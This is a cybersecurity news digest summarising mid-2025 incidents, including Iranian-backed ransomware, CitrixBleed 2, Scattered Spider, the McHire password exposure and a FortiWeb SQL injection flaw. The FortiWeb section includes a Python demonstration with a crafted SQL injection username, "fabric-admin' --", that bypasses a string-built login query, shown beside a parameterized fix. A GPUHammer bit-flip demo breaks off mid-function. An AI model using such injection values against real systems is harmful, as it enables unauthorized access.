CyberSecurity news

Pierluigi Paganini@securityaffairs.com //
Iran is reportedly sponsoring cyber warfare by leveraging ransomware-as-a-service (RaaS) operations with increased profit-sharing incentives for affiliates targeting the United States and Israel. The Pay2Key RaaS group, now operating as Pay2Key.I2P, has resurfaced with an offering of an 80% profit share to hackers who successfully attack Iran's adversaries. This tactic aims to undermine the economies and critical infrastructure of these targeted nations, aligning with a broader trend of nation-states utilizing cyberattacks to advance foreign policy and circumvent economic sanctions. Reports indicate that this operation has already collected over $4 million in extortion payments within a four-month period, with individual operators boasting significant profits.

The resurgence of Pay2Key.I2P highlights the evolving capabilities of Iranian-backed advanced persistent threat (APT) groups. These groups, including those tracked as MuddyWater and APT33, have been observed launching more attacks against U.S. industrial entities. The Pay2Key.I2P campaign is noted for its sophistication, utilizing the I2P anonymizing network and integrating features from other known malware like Mimic. This move not only broadens the group's reach but also signals a clear ideological commitment, with operators explicitly encouraged to target those perceived as enemies of Iran. The group has also expanded its capabilities to include Linux-targeted ransomware, further broadening its potential impact.

This development underscores a growing concern in the cybersecurity landscape, where nation-states are increasingly employing cyberattacks as a tool for geopolitical objectives. The increased profit-sharing offered by Pay2Key.I2P signifies a more aggressive recruitment strategy for cybercriminals willing to engage in these state-sponsored attacks. As these nations continue to invest in and develop their cyber warfare capabilities, the global cybersecurity risks are expected to escalate significantly. Security professionals are urged to stay informed about these evolving threats, understanding attacker methodologies and tools to effectively manage the mounting risks posed by nation-state actors.

References:
  • securityaffairs.com: Iranian group Pay2Key.I2P ramps Up ransomware attacks against Israel and US with incentives for affiliates
  • www.morphisec.com: Reporting on Iranian CyberWarfare
  • newsinterpretation.com: Iranian ransomware gang Pay2Key/I2P returns, offers huge rewards for attacks on U.S. and Israel.
  • Matthew Rosenquist: Iran sponsored Pay2Key Ransomware-as-a-Service (RaaS)
  • securityonline.info: Iranian Ransomware "Pay2Key.I2P" Resurfaces on I2P Network, Offering 80% Profit for Targeting Western Enemies
  • The Hacker News: Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cybercriminals

@socprime.com //
Citrix NetScaler ADC and Gateway systems are currently facing a critical security threat, identified as CVE-2025-5777, and widely nicknamed "CitrixBleed 2". This vulnerability, similar to the infamous CitrixBleed from 2023, allows unauthenticated attackers to exploit memory overread issues. This exploitation can lead to the disclosure of sensitive information, including session tokens and user credentials, enabling attackers to bypass multi-factor authentication and hijack active remote sessions. Security researchers have noted that exploitation of this flaw began as early as mid-June, with evidence pointing to its use in active hacking campaigns.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has officially added CVE-2025-5777 to its Known Exploited Vulnerabilities catalog, citing evidence of active exploitation. This designation carries significant weight, and CISA has issued a stern warning, urging federal civilian agencies to apply necessary patches within 24 hours. The urgency stems from the understanding that vulnerabilities like this are frequent vectors for malicious cyber actors, posing a substantial risk to government and corporate networks. While Citrix initially released guidance and patches in June, concerns have been raised about the vendor's response in acknowledging the widespread exploitation of this critical flaw.

The exploitation of CitrixBleed 2, alongside other critical vulnerabilities like CVE-2025-5349 and CVE-2025-6543, presents a significant risk to organizations. CVE-2025-5777 specifically allows attackers to steal session tokens, effectively enabling them to impersonate authenticated users and bypass security measures like MFA. This is a direct echo of the impact of the original CitrixBleed vulnerability, which was widely abused by nation-state actors and ransomware groups. The ongoing exploitation means that a considerable portion of the Citrix NetScaler user base may still be vulnerable, underscoring the critical need for immediate patching and diligent security practices.

References:
  • Wiz Blog | RSS feed: Critical vulnerabilities in NetScaler ADC exploited in-the-wild: everything you need to know
  • labs.watchtowr.com: How Much More Must We Bleed? - Citrix NetScaler Memory Disclosure (CitrixBleed 2 CVE-2025-5777) - watchTowr Labs
  • socprime.com: CVE-2025-5777 Detection: A New Critical Vulnerability Dubbed "CitrixBleed 2" in NetScaler ADC Faces Exploitation Risk
  • SOC Prime Blog: CVE-2025-5777 Detection: A New Critical Vulnerability Dubbed "CitrixBleed 2" in NetScaler ADC Faces Exploitation Risk
  • Talkback Resources: CVE-2025-5777: CitrixBleed 2 Write-Up… Maybe?
  • Resources-2: CVE-2025-5777: Citrix Bleed 2 Memory Leak Vulnerability Explained
  • Glenn: Thanks to Horizon3, we pushed a tag out today for CitrixBleed 2 CVE-2025-5777 and are backfilling.
  • community.emergingthreats.net: Citrix Netscaler ADC & Gateway Memory Leak CitrixBleed2 (CVE-2025-5777)
  • doublepulsar.com: CitrixBleed 2 exploitation started mid-June — how to spot it
  • horizon3.ai: CVE-2025-5777: CitrixBleed 2 Write-Up… Maybe?
  • The Register - Security: CitrixBleed 2 exploits are on the loose as security researchers yell and wave their hands
  • www.stormshield.com: Security alert Citrix NetScaler CVE-2025-5777: Stormshield Products Response
  • Stormshield: Security alert Citrix NetScaler CVE-2025-5777
  • techcrunch.com: CISA confirms hackers are actively exploiting critical Citrix Bleed 2 bug
  • Blog: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks
  • Zack Whittaker: CISA has given the federal government just one day to patch its NetScaler systems, after confirming Citrix Bleed 2 is being actively exploited in hacking campaigns.
  • www.cybersecuritydive.com: Researchers, CISA confirm active exploitation of critical Citrix Netscaler flaw
  • www.imperva.com: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks
  • The Register - Security: Now everybody but Citrix agrees that CitrixBleed 2 is under exploit
  • techcrunch.com: CISA warns hackers are actively exploiting critical ‘Citrix Bleed 2’ security flaw
  • The Hacker News: CISA adds Citrix NetScaler CVE-2025-5777 to KEV Catalog as Active Exploits Target Enterprises
  • Help Net Security: CISA has added one new vulnerability to its Known Exploited Vulnerabilities catalog, based on evidence of active exploitation.
  • securityaffairs.com: U.S. CISA adds Citrix NetScaler ADC and Gateway flaw to its Known Exploited Vulnerabilities catalog
  • Talkback Resources: CISA tags Citrix Bleed 2 as exploited, gives agencies a day to patch

@blog.checkpoint.com //
Scattered Spider, a financially motivated cyber threat group, has significantly expanded its targeting, with recent intelligence highlighting a new focus on the aviation sector. Known for its aggressive social engineering tactics and identity-focused intrusions, the group has previously targeted telecommunications, SaaS, cloud, and financial services by hijacking user identities and exploiting authentication flows. The FBI has issued a warning, indicating that airlines are now directly in the crosshairs of Scattered Spider. Their methods often involve sophisticated techniques such as SIM swapping, impersonating helpdesk personnel, and employing adversary-in-the-middle (AiTM) phishing to obtain valid credentials and tokens, frequently bypassing multi-factor authentication (MFA). This broader targeting strategy underscores the evolving and increasingly pervasive threat posed by this group.

In a significant development that underscores the reach of Scattered Spider, UK authorities have arrested four individuals linked to a spree of cyberattacks that crippled major British retailers, including Marks & Spencer, Harrods, and the Co-op earlier this year. The arrests, which involved individuals aged 17 to 20, are a major step in a high-priority investigation. The National Crime Agency (NCA) confirmed the arrests, suspecting the individuals of Computer Misuse Act offenses, blackmail, money laundering, and participation in organized crime. These retail attacks caused substantial disruption, with Marks & Spencer estimating losses of around £300 million due to the incident. The methods employed in these attacks, which reportedly included gaining access through social engineering to deploy ransomware, align with Scattered Spider's known modus operandi.

The growing threat posed by Scattered Spider has prompted cybersecurity experts to issue alerts, particularly concerning their expansion into the aviation sector. The group's ability to effectively compromise user identities and bypass security measures like MFA makes them a formidable adversary. Their recent targeting of airlines, following major disruptions in the retail sector, signifies a dangerous escalation. Companies within the aviation industry, and indeed across all sectors, must remain vigilant and bolster their identity-centric defenses to counter the sophisticated tactics employed by Scattered Spider, which include advanced phishing kits, dynamic command and control infrastructure, and custom malware for persistent access.

References:
  • blog.checkpoint.com: Exposing Scattered Spider: New Indicators Highlight Growing Threat to Enterprises and Aviation
  • Resources-2: Tracking Scattered Spider Through Identity Attacks and Token Theft
  • Cloud Security Alliance: Scattered Spider: The Group Behind Major ESXi Ransomware Attacks
  • BrianKrebs: You've probably read by now that British authorities this week arrested 4 people aged 17-20 in re an investigation into data ransom attacks from the cybercrime group Scattered Spider, which has been blamed in breaches at Marks & Spencer, Harrods, MGM Casinos and a bunch of airlines recently.
  • infosec.exchange: 3 teenagers aged 17-19 and a 20-year-old woman arrested in the UK this morning in connection with cyber attacks on Marks & Spencer (M&S) and Co-op retail chains in April-May this year
  • Zack Whittaker: New, by me: U.K. authorities have confirmed the arrest of four alleged hackers behind the recent U.K. retail hacking spree targeting Marks & Spencer, Harrods, and the Co-op earlier this year. The hackers are allegedly linked to Scattered Spider; one of the suspects is aged 17.
  • techcrunch.com: The U.K. National Crime Agency said the suspects are in custody in relation to the hacks targeting Marks & Spencer, Harrods, and the Co-op.
  • SecureWorld News: 4 Arrested in U.K. for Cyberattacks on Retail Tied to Scattered Spider
  • www.nationalcrimeagency.gov.uk: Report on the arrests of four individuals linked to the Scattered Spider hacking group for the cyberattacks on UK retailers.
  • The Register - Security: NCA arrests four in connection with UK retail ransomware attacks
  • krebsonsecurity.com: You've probably read by now that British authorities this week arrested 4 people aged 17-20 in re an investigation into data ransom attacks from the cybercrime group Scattered Spider, which has been blamed in breaches at Marks & Spencer, Harrods, MGM Casinos and a bunch of airlines recently.
  • thecyberexpress.com: UK NCA Arrests Four in Cyberattacks on M&S, Co-op, and Harrods
  • HYPR Blog: Deconstructing the Gen-Z Hackers behind the £440M Cyber Attack on Marks & Spencer, Co-op, and Harrods
  • cyberscoop.com: UK arrests four for cyberattacks on major British retailers
  • Threats | CyberScoop: UK arrests four for cyberattacks on major British retailers
  • WIRED: 4 Arrested Over Scattered Spider Hacking Spree
  • blog.knowbe4.com: Alert from KnowBe4 about Scattered Spider targeting the aviation sector.
  • Metacurity: UK's NCA arrested four people for M&S, Co-Op cyberattacks
  • Risky.Biz: Four Key Players Drive Scattered Spider
  • Talkback Resources: UK charges four in Scattered Spider ransom group
  • TechInformed: Four people have been arrested as part of a National Crime Agency (NCA) investigation into cyberattacks targeting major UK retailers M&S, Harrods and Co-op.
  • Help Net Security: The UK's National Crime Agency (NCA) arrested four individuals suspected of being involved in cyberattacks on major retailers in the country, including Marks & Spencer, Co-op, and Harrods.
  • hackread.com: UK Arrests Woman and Three Men for Cyberattacks on M&S Co-op and Harrods
  • securityaffairs.com: UK NCA arrested four people over M&S, Co-op cyberattacks
  • BleepingComputer: The UK's National Crime Agency (NCA) arrested four people suspected of being involved in cyberattacks on major retailers in the country, including Marks & Spencer, Co-op, and Harrods.

@databreaches.net //
McDonald's has been at the center of a significant data security incident involving its AI-powered hiring tool, Olivia. The vulnerability, discovered by security researchers, allowed unauthorized access to the personal information of approximately 64 million job applicants. This breach was attributed to a shockingly basic security flaw: the AI hiring platform's administrator account was protected by the default password "123456." This weak credential meant that malicious actors could potentially gain access to sensitive applicant data, including chat logs containing personal details, by simply guessing the username and password. The incident raises serious concerns about the security measures in place for AI-driven recruitment processes.

The McHire platform, which is utilized by a vast majority of McDonald's franchisees to streamline the recruitment process, collects a wide range of applicant information. Researchers were able to access chat logs and personal data, such as names, email addresses, phone numbers, and even home addresses, by exploiting the weak password and an additional vulnerability in an internal API. This means that millions of individuals who applied for positions at McDonald's may have had their private information compromised. The ease with which this access was gained highlights a critical oversight in the implementation of the AI hiring system, underscoring the risks associated with inadequate security practices when handling large volumes of sensitive personal data.

While the security vulnerability has reportedly been fixed, and there are no known instances of the exposed data being misused, the incident serves as a stark reminder of the potential consequences of weak security protocols, particularly with third-party vendors. The responsibility for maintaining robust cybersecurity standards falls on both the companies utilizing these technologies and the vendors providing them. This breach emphasizes the need for rigorous security testing and the implementation of strong, unique passwords and multi-factor authentication to protect applicant data from falling into the wrong hands. Companies employing AI in sensitive processes like hiring must prioritize data security to maintain the trust of job seekers and prevent future breaches.

References:
  • Talkback Resources: Leaking 64 million McDonald’s job applications
  • Security Latest: McDonald’s AI Hiring Bot Exposed Millions of Applicants' Data to Hackers Using the Password ‘123456’
  • Malwarebytes: The job applicants' personal information could be accessed by simply guessing a username and using the password “12345.”
  • www.wired.com: McDonald’s AI Hiring Bot Exposed Millions of Applicants' Data to Hackers Using the Password ‘123456’
  • www.pandasecurity.com: Yes, it was. The personal information of approximately 64 million McDonald’s applicants was left unprotected due to login details consisting of a username and password…
  • Cybersecurity Blog: McDonald's Hiring Bot Blunder: AI, Fries and a Side of Job Seeker Data
  • techcrunch.com: AI chatbot’s simple ‘123456’ password risked exposing personal data of millions of McDonald’s job applicants
  • www.pandasecurity.com: Was the data of 64 million McDonald’s applicants left protected only by a flimsy password?
  • Talkback Resources: McDonald’s job app exposes data of 64 Million applicants
  • hackread.com: McDonald’s AI Hiring Tool McHire Leaked Data of 64 Million Job Seekers
  • futurism.com: McDonald’s AI Hiring System Just Leaked Personal Data About Millions of Job Applicants
  • hackread.com: Security flaws in McDonald's McHire chatbot exposed over 64 million applicants' data.
  • www.csoonline.com: McDonald’s AI hiring tool’s password ‘123456’: Exposes data of 64M applicants
  • Palo Alto Networks Blog: The job applicants' personal information could be accessed by simply guessing a username and using the password “123456.”
  • SmartCompany: Big Hack: How a default password left millions of McDonald’s job applications exposed
  • Talkback Resources: '123456' password exposed chats for 64 million McDonald’s job applicants
  • databreaches.net: McDonald’s just got a supersized reminder to beef up its digital security after its recruitment platform allegedly exposed the sensitive data of 64 million applicants.
  • BleepingComputer: Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the chats of more than 64 million job applications across the United States.
  • PrivacyDigest: McDonald’s Exposed Millions of Applicants' Data to Using the ‘123456’
  • www.tomshardware.com: McDonald's McHire bot exposed personal information of 64M people by using '123456' as a password in 2025
  • bsky.app: Cybersecurity researchers discovered a vulnerability in McHire, McDonald's chatbot job application platform, that exposed the personal information of more than 64 million job applicants across the United States.
  • malware.news: McDonald’s just got a supersized reminder to beef up its digital security after its recruitment platform allegedly exposed the sensitive data of 64 million applicants.

@securelist.com //
Developers using the AI-powered coding assistant Cursor have fallen victim to a sophisticated crypto heist, losing an estimated $500,000. The incident involved a malicious extension, disguised as a legitimate tool for Solidity developers, which was distributed through the Open VSX marketplace. This marketplace, which serves as a source of extensions for AI development tools like Cursor, does not apply the same stringent security checks as other marketplaces, creating a gap that attackers exploited. The fake extension, titled "Solidity Language," managed to gain tens of thousands of downloads, likely boosted by bot activity, and successfully deceived even experienced users.

The malicious extension operated by silently executing PowerShell scripts and installing remote access tools on the victim's computer. Upon installation, the extension contacted a command-and-control server to download and run these harmful scripts. The attackers then leveraged the installed remote access application, ScreenConnect, to gain full control of the compromised system. This allowed them to upload additional malicious payloads, specifically targeting the developer's crypto wallet passphrases and ultimately siphoning off approximately $500,000 in cryptocurrency assets. The attackers also employed algorithm tricks to ensure the malicious extension ranked highly in search results, further increasing its visibility and the likelihood of it being downloaded by unsuspecting developers.

This incident highlights a growing trend of attacks that leverage vulnerabilities within the open-source software ecosystem. While the Solidity Language extension itself offered no actual functionality, its deceptive appearance and elevated search ranking allowed it to trick users into installing malware. Security experts are urging developers to exercise extreme caution when installing extensions, emphasizing the importance of verifying extension authors and using robust security tools. The weaponization of AI-enhanced development tools serves as a stark reminder that the very tools designed to enhance productivity can be turned into vectors for significant financial loss if not handled with the utmost security awareness.

References:
  • Lukasz Olejnik: Malicious extension to AI software development assistant Cursor contained malware. It silently executed PowerShell scripts, installed remote access tools, and stole $500K in crypto from a blockchain dev. It ranked high in search due to algorithm tricks, fooling even experienced users. Always verify extensions, check author names, and use real security tools—AI-enhanced dev tools can be weaponized too.
  • Securelist: Code highlighting with Cursor AI for $500,000
  • securelist.com: Malicious extension to AI software development assistant Cursor contained malware. It silently executed PowerShell scripts, installed remote access tools, and stole $500K in crypto from a blockchain dev.
  • cyberinsider.com: Fake Visual Studio Code extension for Cursor led to $500K theft

Eric Geller@cybersecuritydive.com //
Businesses are facing a growing wave of sophisticated phishing attacks, with mobile-based scams seeing a significant surge. Reports indicate that nearly six in ten companies have experienced incidents involving voice or text phishing that resulted in executive impersonation. Despite the prevalence of these attacks, with 77% of companies experiencing at least one such incident in the past six months, a concerningly low number of businesses, only half of those surveyed, express significant concern. This overconfidence leaves organizations more vulnerable than they realize, as attackers increasingly leverage mobile channels to trick employees into revealing credentials. These tactics often bypass traditional security measures, making detection incredibly difficult until irreversible damage has occurred.

The threat landscape is further complicated by the emergence of AI-generated content used to create highly convincing phishing lures. Researchers have noted that AI-powered search engine summaries are mistakenly suggesting phishing sites when users are attempting to find legitimate login pages. This fusion of AI and social engineering techniques makes these scams harder to identify and defend against. Compounding these issues, a major data leak involving McDonald's recruitment chatbot, Olivia, highlighted a critical security oversight. An administrator account was found using the default password "123456," potentially exposing sensitive data from over 60 million job applications. This breach underscores how basic security flaws can lead to massive data exposure in even advanced systems.

To combat this escalating threat, companies are strongly advised to bolster their security awareness training programs and implement more robust security measures. The use of AI in crafting phishing campaigns, coupled with the pervasive nature of mobile attacks and basic security vulnerabilities, creates a more dangerous environment for businesses. Organizations must prioritize comprehensive training that educates employees on recognizing these advanced social engineering tactics and reinforce the importance of strong, unique passwords and multi-factor authentication across all systems. Proactive security strategies are essential to protect sensitive data and maintain operational integrity in the face of evolving cyber threats.


David Jones@cybersecuritydive.com //
The cybersecurity community is on high alert due to the active exploitation of a critical vulnerability in Citrix NetScaler devices, known as CitrixBleed 2 (CVE-2025-5777). This flaw allows attackers to perform dangerous memory leak attacks, potentially exposing sensitive user credentials and other confidential data. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has officially recognized the severity of this threat by adding it to its Known Exploited Vulnerabilities catalog, citing evidence of active exploitation. Federal agencies have been given a strict 24-hour deadline to patch affected systems, underscoring the urgency of the situation and the significant risk posed to government and enterprise networks.

CitrixBleed 2, which researchers have noted shares similarities with a previous critical vulnerability in Citrix NetScaler (CVE-2023-4966), enables attackers to bypass multi-factor authentication (MFA) and hijack user sessions. This memory leak vulnerability, stemming from insufficient input validation, allows unauthenticated attackers to read sensitive information from NetScaler devices configured as Gateways or AAA virtual servers. The exploitation of this flaw appears to have begun in late June, with reports indicating that some attackers may be linked to ransomware groups. The ease with which session tokens can be stolen and replayed to impersonate authenticated users presents a substantial threat to organizations relying on these Citrix products for remote access.

In response to the escalating threat, cybersecurity researchers have confirmed widespread scanning and probing activity for the vulnerability. The U.S. CISA's inclusion of CVE-2025-5777 on its Known Exploited Vulnerabilities list serves as a strong warning to all organizations to prioritize patching their Citrix NetScaler ADC and Gateway devices immediately. Failure to do so leaves networks vulnerable to sophisticated attacks that can lead to significant data breaches and operational disruptions. Organizations are strongly advised to apply the latest security patches and updates as soon as possible to mitigate the risks associated with this critical vulnerability.

References:
  • The Register - Security: Now everybody but Citrix agrees that CitrixBleed 2 is under exploit
  • securityaffairs.com: U.S. CISA adds Citrix NetScaler ADC and Gateway flaw to its Known Exploited Vulnerabilities catalog
  • The Hacker News: CISA Adds Citrix NetScaler CVE-2025-5777 to KEV Catalog as Active Exploits Target Enterprises
  • www.cybersecuritydive.com: Researchers, CISA confirm active exploitation of critical Citrix Netscaler flaw
  • Blog: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks
  • techcrunch.com: CISA warns hackers are actively exploiting critical ‘Citrix Bleed 2’ security flaw
  • www.imperva.com: CVE-2025-5777 Exposes Citrix NetScaler to Dangerous Memory Leak Attacks

info@thehackernews.com (The Hacker News) //
Fortinet has issued a critical patch for a severe SQL injection vulnerability affecting its FortiWeb product. Identified as CVE-2025-25257, the flaw resides within the Fabric Connector feature. This vulnerability allows an unauthenticated attacker to execute unauthorized SQL commands and potentially gain access to sensitive information on affected systems. The issue stems from improper input sanitization, enabling attackers to manipulate SQL queries through specially crafted HTTP requests. The vulnerability has a high severity score of 9.8 out of 10, highlighting the significant risk it poses to organizations.

The vulnerability specifically impacts multiple versions of FortiWeb, including versions 7.6.0 through 7.6.3, 7.4.0 through 7.4.7, 7.2.0 through 7.2.10, and 7.0.0 through 7.0.10. The FortiWeb Fabric Connector acts as a crucial middleware, connecting FortiWeb web application firewalls with other Fortinet products for dynamic security updates. Attackers can exploit this flaw by sending malicious SQL payloads within HTTP Authorization headers, bypassing authentication controls and potentially leading to remote code execution. Researchers have demonstrated that this SQL injection can be escalated to achieve full system compromise by leveraging MySQL's INTO OUTFILE statement to write files to the server and executing them via Python scripts.
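To make the vulnerability class concrete, here is an added, generic illustration of the pattern the write-ups describe (text from an HTTP Authorization header spliced into a SQL statement) beside the parameterized form that prevents it. This is not FortiWeb code and does not reproduce the Fabric Connector's logic, query or schema; the table, the credential values and the header values are constructed for the demonstration, and SQLite stands in for the MySQL backend the research refers to.

```python
"""Authorization-header credential lookup: a string-built query (injectable) beside
a parameterized query. Generic illustration; schema and values are constructed."""
import base64
import sqlite3


def make_db():
    """In-memory table standing in for an API credential store (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE api_users (username TEXT NOT NULL, token TEXT NOT NULL)")
    conn.execute("INSERT INTO api_users VALUES ('fabric-admin', 'constructed-secret-token')")
    conn.commit()
    return conn


def basic_header(username, token):
    """Build an HTTP Basic Authorization header value for the demonstration."""
    raw = f"{username}:{token}".encode("utf-8")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def split_basic(header):
    """Return (username, token) from a Basic header, or None if it is malformed."""
    scheme, _, value = header.partition(" ")
    if scheme.lower() != "basic" or not value:
        return None
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    username, sep, token = decoded.partition(":")
    if not sep:
        return None
    return username, token


def lookup_vulnerable(conn, username, token):
    """Vulnerable: header-derived text is formatted into the SQL statement, so a
    quote inside the username ends the literal and the remainder is read as SQL.
    Decoding the header does nothing to neutralize this; the flaw is the splice."""
    query = (
        "SELECT username FROM api_users "
        f"WHERE username = '{username}' AND token = '{token}'"
    )
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def lookup_hardened(conn, username, token):
    """Hardened: placeholders keep the header text as data. The same input that
    slips past the vulnerable version now simply matches no row."""
    row = conn.execute(
        "SELECT username FROM api_users WHERE username = ? AND token = ?",
        (username, token),
    ).fetchone()
    return row[0] if row else None


def authenticate(conn, header, lookup):
    """Resolve a header to a username with the given lookup, or None."""
    creds = split_basic(header)
    if creds is None:
        return None
    return lookup(conn, *creds)


if __name__ == "__main__":
    db = make_db()
    legit = basic_header("fabric-admin", "constructed-secret-token")
    # A username that closes the quoted literal and comments out the token check.
    tampered = basic_header("fabric-admin' --", "wrong")
    for name, lookup in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        print(name, "legit ->", authenticate(db, legit, lookup),
              "tampered ->", authenticate(db, tampered, lookup))
```

The contrast is the whole point: the same tampered header authenticates as `fabric-admin` against the string-built query and is rejected by the parameterized one, which is why input "sanitization" of header text is the wrong fix and prepared statements are the right one. The file-write escalation mentioned above is a consequence of the same unparameterized splice and is not reproduced here.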

Given the critical nature of this vulnerability and the availability of proof-of-concept exploits, Fortinet strongly urges all users of affected FortiWeb versions to apply the provided patches immediately. Organizations should update to FortiWeb 7.6.4, 7.4.8, 7.2.11, 7.0.11, or later versions to mitigate the risk of exploitation. As a temporary workaround, disabling the HTTP/HTTPS administrative interface can also help reduce exposure until the patches can be applied. Swift action is crucial to prevent potential data breaches and unauthorized access to sensitive systems.

References:
  • labs.watchtowr.com: Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) - watchTowr Labs
  • The Hacker News: Fortinet Releases Patch for Critical SQL Injection Flaw in FortiWeb (CVE-2025-25257)
  • arcticwolf.com: CVE-2025-25257: Critical Unauthenticated SQL Injection Vulnerability in FortiWeb
  • Talkback Resources: Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257)
  • cyberpress.org: Fortinet FortiWeb Vulnerability Exploited for Remote Code Execution via Fabric Connector
  • Talkback Resources: Pre-Auth SQL Injection to RCE - Fortinet FortiWeb Fabric Connector (CVE-2025-25257) [app] [exp]
  • cyberpress.org: Cyberpress: Fortinet FortiWeb Fabric Connector Vulnerability Exploited to Execute Remote Code
  • Talkback Resources: Proof-of-concept exploits have been released for a critical SQLi vulnerability in Fortinet FortiWeb that can be used to achieve pre-authenticated remote code execution on vulnerable servers.
  • Arctic Wolf: CVE-2025-25257: Critical Unauthenticated SQL Injection Vulnerability in FortiWeb
  • hackread.com: Critical Vulnerability Exposes Fortinet FortiWeb to Full Takeover (CVE-2025-25257)
  • securityaffairs.com: Patch immediately: CVE-2025-25257 PoC enables remote code execution on Fortinet FortiWeb
  • gbhackers.com: Fortinet FortiWeb Fabric Connector Flaw Enables Remote Code Execution
  • Cyber Security News: Security researchers have identified a critical pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb Fabric Connector, designated as CVE-2025-25257, that allows unauthenticated attackers to achieve remote code execution on affected systems.
  • gbhackers.com: Security researchers have identified a severe pre-authentication SQL injection vulnerability in Fortinet’s FortiWeb Fabric Connector, designated as CVE-2025-25257, that allows unauthenticated attackers to execute unauthorized SQL commands and potentially achieve remote code execution.
  • cert.europa.eu: On July 8, 2025, Fortinet released a security advisory addressing a critical vulnerability in its FortiWeb product that would allow an attacker to execute unauthorised code or commands on the affected systems.

@cyberscoop.com //
Cybersecurity researchers have identified a critical set of vulnerabilities, collectively named PerfektBlue, affecting OpenSynergy's BlueSDK Bluetooth stack. These flaws, which can be chained together to achieve remote code execution, pose a significant risk to millions of vehicles. Automakers such as Mercedes-Benz, Volkswagen, and Skoda are confirmed to be impacted, along with an additional unnamed manufacturer. The vulnerabilities could allow attackers, within Bluetooth range, to compromise infotainment systems, potentially leading to unauthorized access to sensitive vehicle functions.

The PerfektBlue attack leverages a chain of vulnerabilities including a critical use-after-free flaw in the AVRCP service (CVE-2024-45434) and issues within L2CAP and RFCOMM protocols. Successful exploitation can enable attackers to execute arbitrary code on a car's system, potentially allowing them to track GPS coordinates, record audio, access contact lists, and even pivot to more critical systems. While infotainment systems are often isolated, the effectiveness of this separation varies by manufacturer, meaning some attacks could provide a pathway to controlling core vehicle functions.

OpenSynergy confirmed these vulnerabilities last year and released patches in September 2024. However, many automakers have yet to implement these crucial updates, leaving millions of vehicles exposed. The attack requires an attacker to pair with the target vehicle's infotainment system via Bluetooth, a process that can vary in user interaction depending on the manufacturer's implementation. While patches are available, the widespread delay in deployment means that a significant number of cars remain vulnerable to this potentially far-reaching exploit.

Recommended read:
References :
  • cyberscoop.com: Researchers identify critical vulnerabilities in automotive Bluetooth systems
  • The Hacker News: PerfektBlue Bluetooth Vulnerabilities Expose Millions of Vehicles to Remote Code Execution
  • securityaffairs.com: PerfektBlue Bluetooth attack allows hacking infotainment systems of Mercedes, Volkswagen, and Skoda
  • CyberScoop: Researchers identify critical vulnerabilities in automotive Bluetooth systems
  • www.bleepingcomputer.com: Four vulnerabilities dubbed PerfektBlue and affecting the BlueSDK Bluetooth stack from OpenSynergy can be exploited to achieve remote code execution and potentially allow access to critical elements in vehicles from multiple vendors, including Mercedes-Benz AG, Volkswagen, and Skoda.
  • PCWorld: Your Mercedes or Volkswagen could get hacked via Bluetooth
  • malware.news: Malware News: Widespread automobile hacking likely with PerfektBlue Bluetooth bugs

The Hacker News@thehackernews.com //
A significant security vulnerability, dubbed GPUHammer, has been demonstrated against NVIDIA GPUs, specifically targeting GDDR6 memory. Researchers from the University of Toronto have successfully executed a Rowhammer attack variant on an NVIDIA A6000 GPU, causing bit flips in the memory. This type of attack exploits the physical behavior of DRAM chips, where rapid access to one memory row can induce errors, or bit flips, in adjacent rows. While Rowhammer has been a known issue for CPUs, this marks the first successful demonstration against a discrete GPU, raising concerns about the integrity of data and computations performed on these powerful processors, especially within the burgeoning field of artificial intelligence.

The practical implications of GPUHammer are particularly alarming for machine learning models. In a proof-of-concept demonstration, researchers were able to degrade the accuracy of a deep neural network model from 80% to a mere 0.1% by inducing a single bit flip. This degradation highlights the vulnerability of AI infrastructure, which increasingly relies on GPUs for parallel processing and complex calculations. Such attacks could compromise the reliability and trustworthiness of AI systems, impacting everything from image recognition to complex decision-making processes. NVIDIA has acknowledged these findings and is urging its customers to implement specific security measures to defend against this threat.

In response to the GPUHammer attack, NVIDIA is strongly recommending that customers enable System-level Error Correction Code (ECC) on their GDDR6 GPUs. ECC is a hardware-level mechanism that detects and corrects errors in memory. The schemes typically used correct a single flipped bit per protected word and detect, but cannot correct, two flipped bits, so ECC defeats the single-bit flips GPUHammer demonstrated without being an absolute guarantee against every Rowhammer outcome; it also reserves some memory capacity and bandwidth for the check bits, which is the trade-off that leaves it disabled on many cards. NVIDIA's guidance applies to a wide range of its professional and data center GPU architectures, including Blackwell, Hopper, Ada, Ampere, and Turing. Administrators can inspect the current and pending ECC state with `nvidia-smi -q -d ECC` and enable it with `nvidia-smi -e 1`; the change takes effect after a GPU reset or reboot, so a host that reports ECC "pending" is not yet protected. While consumer-grade GPUs may have limited ECC support, the company emphasizes that its enterprise-grade and data center solutions, many of which have ECC enabled by default, are the recommended choice for applications requiring enhanced security assurance. This measure aims to protect users from data tampering and maintain the integrity of critical workloads.
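
Why one flipped bit can wreck a model is easier to see in code than in prose. The block below is an added example written for this page, not the Toronto researchers' code: a single linear neuron stands in for the deep network in the paper, the 5x5 point grid is constructed, and `flip_bit` simply XORs one bit of a weight's IEEE-754 float32 encoding, which is what a Rowhammer flip in stored weight memory looks like to the model. Flipping exponent bit 29 turns the weight 1.0 into 2**-64 and drops accuracy from 100% to 64%; flipping the sign bit drops it to 36%.

```python
import struct


def flip_bit(value: float, bit: int) -> float:
    """Return the float32 whose IEEE-754 encoding differs from `value` in exactly one bit
    (bits 0..22 mantissa, 23..30 exponent, 31 sign)."""
    if not 0 <= bit <= 31:
        raise ValueError("float32 has bits 0..31")
    (encoding,) = struct.unpack("<I", struct.pack("<f", value))
    (flipped,) = struct.unpack("<f", struct.pack("<I", encoding ^ (1 << bit)))
    return flipped


def predict(weights, bias, features) -> int:
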